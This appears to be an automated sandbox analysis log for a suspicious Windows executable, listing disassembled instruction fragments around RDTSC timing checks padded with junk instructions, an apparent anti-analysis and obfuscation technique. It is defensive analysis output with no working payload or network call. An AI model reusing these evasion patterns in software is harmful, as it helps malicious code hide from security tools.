                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E133 second address: 54E16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007F4C288D0392h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4C288D0399h 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E2F3 second address: 54E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E2F7 second address: 54E30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52D4C5 second address: 52D4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F4C28D8B356h 0x00000011 popad 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E646 second address: 52E64C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E64C second address: 52E65A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E65A second address: 52E65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53047B second address: 5304B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4C28D8B366h 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 532525 second address: 53252F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4C288D0386h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5365F9 second address: 536607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F4C28D8B356h 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53841C second address: 538420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 539586 second address: 53958A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53C4AE second address: 53C4DB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C288D038Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4C288D0399h 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53B4E9 second address: 53B598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 jng 00007F4C28D8B372h 0x0000000f jbe 00007F4C28D8B36Ch 0x00000015 jmp 00007F4C28D8B366h 0x0000001a nop 0x0000001b clc 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+122D31C5h], edx 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 mov edi, dword ptr [ebp+122D2960h] 0x00000036 mov bl, 8Ch 0x00000038 mov eax, dword ptr [ebp+122D0C15h] 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F4C28D8B358h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov edi, 24F4C65Ah 0x0000005d push FFFFFFFFh 0x0000005f call 00007F4C28D8B35Dh 0x00000064 mov bx, si 0x00000067 pop ebx 0x00000068 nop 0x00000069 jmp 00007F4C28D8B364h 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F4C28D8B35Dh 0x00000076 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 538420 second address: 53844F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F4C288D038Dh 0x00000010 jmp 00007F4C288D0396h 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53B598 second address: 53B59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53C5C4 second address: 53C5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53C5C8 second address: 53C5CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5334C5 second address: 5334C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5334C9 second address: 5334CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5335AD second address: 5335CA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e je 00007F4C288D0386h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F4C288D0386h 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5335CA second address: 5335CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 552C92 second address: 552CAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4C288D0394h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 552CAC second address: 552CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4C28D8B356h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 552CB6 second address: 552CE7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C288D0386h 0x00000008 jmp 00007F4C288D0398h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4C288D038Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 552CE7 second address: 552CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5532A7 second address: 5532AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5533FD second address: 55341F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B362h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F4C28D8B356h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55341F second address: 553423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 553585 second address: 55358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55358D second address: 5535A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F4C288D0390h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5538A9 second address: 5538DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4C28D8B371h 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007F4C28D8B358h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5538DC second address: 5538E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5538E2 second address: 553905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4C28D8B369h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 553905 second address: 55390B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 553EB5 second address: 553EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F4C28D8B35Ch 0x0000000d pushad 0x0000000e jmp 00007F4C28D8B35Dh 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 553EDA second address: 553EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 557367 second address: 55736D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55736D second address: 557376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 557376 second address: 557391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B360h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 557391 second address: 557395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55A1F1 second address: 55A20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B367h 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55A20D second address: 55A218 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F4C288D0386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55FE88 second address: 55FE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4C28D8B356h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4DBDAE second address: 4DBDC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Ah 0x00000007 jbe 00007F4C288D038Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55E9F9 second address: 55EA06 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4C28D8B358h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55EA06 second address: 55EA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55EA14 second address: 55EA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4C28D8B356h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55EF94 second address: 55EF9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55F240 second address: 55F244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55F38D second address: 55F391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 507A15 second address: 507A2F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C28D8B356h 0x00000008 jbe 00007F4C28D8B356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jno 00007F4C28D8B356h 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 566249 second address: 56624E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56624E second address: 566267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B35Ch 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 566267 second address: 56626E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56626E second address: 56628E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F4C28D8B364h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51F6B9 second address: 51F6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51F6BD second address: 51F6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51F6C3 second address: 506DF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4C288D0394h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F4C288D0388h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub edi, 28592DE2h 0x00000031 jp 00007F4C288D038Ch 0x00000037 mov dword ptr [ebp+122D327Eh], esi 0x0000003d call dword ptr [ebp+122D322Dh] 0x00000043 push eax 0x00000044 push edx 0x00000045 jne 00007F4C288D03A4h 0x0000004b pushad 0x0000004c push esi 0x0000004d pop esi 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 popad 0x00000051 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51F8DE second address: 51F8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FB35 second address: 51FB58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F4C288D038Eh 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF26 second address: 51FF30 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C28D8B35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF30 second address: 51FF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F4C288D039Dh 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F4C288D0388h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF79 second address: 51FF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF7D second address: 51FF87 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF87 second address: 51FF91 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4C28D8B35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520051 second address: 520055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52093F second address: 520945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520AC0 second address: 507A15 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C288D0388h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ecx, ebx 0x0000000f call dword ptr [ebp+1244BF0Dh] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E0E76 second address: 4E0E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4C28D8B35Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F4C28D8B356h 0x00000015 jnp 00007F4C28D8B356h 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E0E99 second address: 4E0EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 565834 second address: 565838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 565838 second address: 56583E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 565E5C second address: 565E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 565E63 second address: 565E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B036 second address: 56B046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4C28D8B356h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B046 second address: 56B057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4C288D0386h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B5EE second address: 56B5FB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B5FB second address: 56B60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
